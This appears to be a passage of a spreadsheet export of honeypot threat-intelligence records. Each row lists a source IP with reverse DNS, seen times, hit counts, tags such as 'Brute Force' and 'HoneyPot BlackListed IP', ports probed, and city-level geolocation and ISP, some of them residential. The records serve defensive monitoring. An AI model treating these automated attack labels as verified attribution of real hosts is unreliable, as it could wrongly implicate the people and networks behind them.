    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc86:f427"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1762"/>
    <x v="1762"/>
    <s v="NA&amp;&amp;114-35-208-156.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-14T22:10:15"/>
    <d v="2024-04-03T07:12:00"/>
    <d v="2025-04-14T22:10:15"/>
    <n v="398"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_HTTP_H19&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_MT-CPA_H25&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H5"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;80&amp;&amp;54557&amp;&amp;9100&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login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7223:d09c"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1763"/>
    <x v="1763"/>
    <s v="ool-ad0380b0.dyn.optonline.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-14T22:10:13"/>
    <d v="2025-03-24T20:58:01"/>
    <d v="2025-04-14T22:10:13"/>
    <n v="9"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H3"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="NY"/>
    <s v="New York"/>
    <s v="Nassau"/>
    <s v="Hicksville"/>
    <s v="5120656"/>
    <s v="11801"/>
    <s v="40.76"/>
    <s v="-73.5044"/>
    <s v="6128"/>
    <s v="Cablevision Systems Corp."/>
    <s v="Cablevision Systems Corp."/>
    <s v="residential"/>
    <s v="Optimum Online (Cablevision Systems)"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ad03:80b0"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1764"/>
    <x v="1764"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T21:45:59"/>
    <d v="2025-01-23T06:41:41"/>
    <d v="2025-04-14T21:45:59"/>
    <n v="15"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MYSQL_H12&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="3306&amp;&amp;1433&amp;&amp;1080"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taoyuan"/>
    <s v="Taoyuan"/>
    <s v="6696918"/>
    <s v="NA"/>
    <s v="25.0797"/>
    <s v="121.234"/>
    <s v="142002"/>
    <s v="Scloud Pte Ltd"/>
    <s v="Scloud Pte Ltd"/>
    <s v="hosting"/>
    <s v="Scloud Pte Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SOCKS5:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a59a:c3df"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1765"/>
    <x v="1765"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T21:29:03"/>
    <d v="2025-04-14T21:29:03"/>
    <d v="2025-04-14T21:29:03"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_FTP_HC1"/>
    <s v="21"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'cbl.abuseat.org': ['unknown']}"/>
    <n v="72"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KG"/>
    <s v="Kyrgyzstan"/>
    <s v="GB"/>
    <s v="Bishkek"/>
    <s v="NA"/>
    <s v="Bishkek"/>
    <s v="1528675"/>
    <s v="NA"/>
    <s v="42.87"/>
    <s v="74.59"/>
    <s v="42837"/>
    <s v="extraline"/>
    <s v="ElCat LIR"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_FTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5e8f:c6c2"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1766"/>
    <x v="1766"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T21:28:06"/>
    <d v="2025-04-14T21:28:06"/>
    <d v="2025-04-14T21:28:06"/>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7:c7ee"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1767"/>
    <x v="1767"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T21:25:31"/>
    <d v="2025-04-14T21:25:31"/>
    <d v="2025-04-14T21:25:31"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="17813"/>
    <s v="MTNL-AP"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="MTNL Delhi"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7839:d4a3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1768"/>
    <x v="1768"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T21:24:50"/>
    <d v="2025-04-14T21:24:50"/>
    <d v="2025-04-14T21:24:50"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Brute Force"/>
    <s v="high"/>
    <s v="SMA-LAB_corporatelogin_Login.NIPPONINDIAIM_HC1"/>
    <s v="443"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="AE"/>
    <s v="United Arab Emirates"/>
    <s v="DU"/>
    <s v="Dubai"/>
    <s v="Northwest"/>
    <s v="Dubai (Hor Al Anz)"/>
    <s v="292223"/>
    <s v="33002 96696"/>
    <s v="25.2775"/>
    <s v="55.3418"/>
    <s v="5384"/>
    <s v="EMIRATES-INTERNET"/>
    <s v="Emirates Telecommunications Corporation"/>
    <s v="consumer"/>
    <s v="Etisalat"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login"/>
    <s v="{HTTP_LOGIN:Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:232:a9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="High"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1769"/>
    <x v="1769"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T21:13:05"/>
    <d v="2025-04-14T21:13:05"/>
    <d v="2025-04-14T21:13:05"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d1:cf63"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1770"/>
    <x v="1770"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T21:12:25"/>
    <d v="2025-04-14T21:09:43"/>
    <d v="2025-04-14T21:12:25"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="NA"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="45899"/>
    <s v="VNPT Corp"/>
    <s v="VNPT"/>
    <s v="business"/>
    <s v="Vietnam Posts and Telecommunications Group"/>
    <s v="2010-08-16"/>
    <s v="VNPT-VN"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ebb:f654"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1771"/>
    <x v="1771"/>
    <s v="114-35-68-31.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-14T21:11:26"/>
    <d v="2024-09-11T09:11:00"/>
    <d v="2025-04-14T21:11:26"/>
    <n v="671"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H25&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H16"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;23&amp;&amp;80&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one"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7223:441f"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1772"/>
    <x v="1772"/>
    <s v="114-32-248-93.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-14T21:11:26"/>
    <d v="2024-08-30T21:42:28"/>
    <d v="2025-04-14T21:11:26"/>
    <n v="350"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H4&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H11"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;59063&amp;&amp;80&amp;&amp;23&amp;&amp;38952&amp;&amp;38974&amp;&amp;NA&amp;&amp;9100"/>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NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7220:f85d"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1773"/>
    <x v="1773"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T20:55:36"/>
    <d v="2025-04-14T20:55:36"/>
    <d v="2025-04-14T20:55:36"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="WB"/>
    <s v="West Bengal"/>
    <s v="South 24 Paraganas"/>
    <s v="Canning"/>
    <s v="1274984"/>
    <s v="NA"/>
    <s v="22.314"/>
    <s v="88.6651"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c2:8433"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1774"/>
    <x v="1774"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T20:39:48"/>
    <d v="2024-07-17T06:34:01"/>
    <d v="2025-04-14T20:39:48"/>
    <n v="33"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_SSH_H41&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13"/>
    <s v="1433&amp;&amp;22&amp;&amp;3306&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (117.241.151.168,37828)}&amp;&amp;{Data_SMB:Incoming connection (117.241.151.168,40840)}&amp;&amp;{Data_SMB:Incoming connection (117.241.151.168,52625)}&amp;&amp;{Data_SMB:Incoming connection (117.241.151.168,15851)}&amp;&amp;{Data_SMB:Incoming connection (117.241.151.168,35323)}&amp;&amp;{Data_SMB:Incoming connection (117.241.151.168,29690)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f1:97a8"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1775"/>
    <x v="1775"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T20:33:36"/>
    <d v="2025-03-10T22:11:26"/>
    <d v="2025-04-14T20:33:36"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taipei"/>
    <s v="New Taipei"/>
    <s v="Yingge District"/>
    <s v="1665491"/>
    <s v="NA"/>
    <s v="24.9622"/>
    <s v="121.331"/>
    <s v="9416"/>
    <s v="Hoshin Multimedia Center Inc."/>
    <s v="Hoshin Multimedia Center Inc."/>
    <s v="residential"/>
    <s v="Hoshin Multimedia Center Inc"/>
    <s v="2000-10-18"/>
    <s v="HOSHIN-MULTIMEDIA"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:cbcc:ddb6"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1776"/>
    <x v="1776"/>
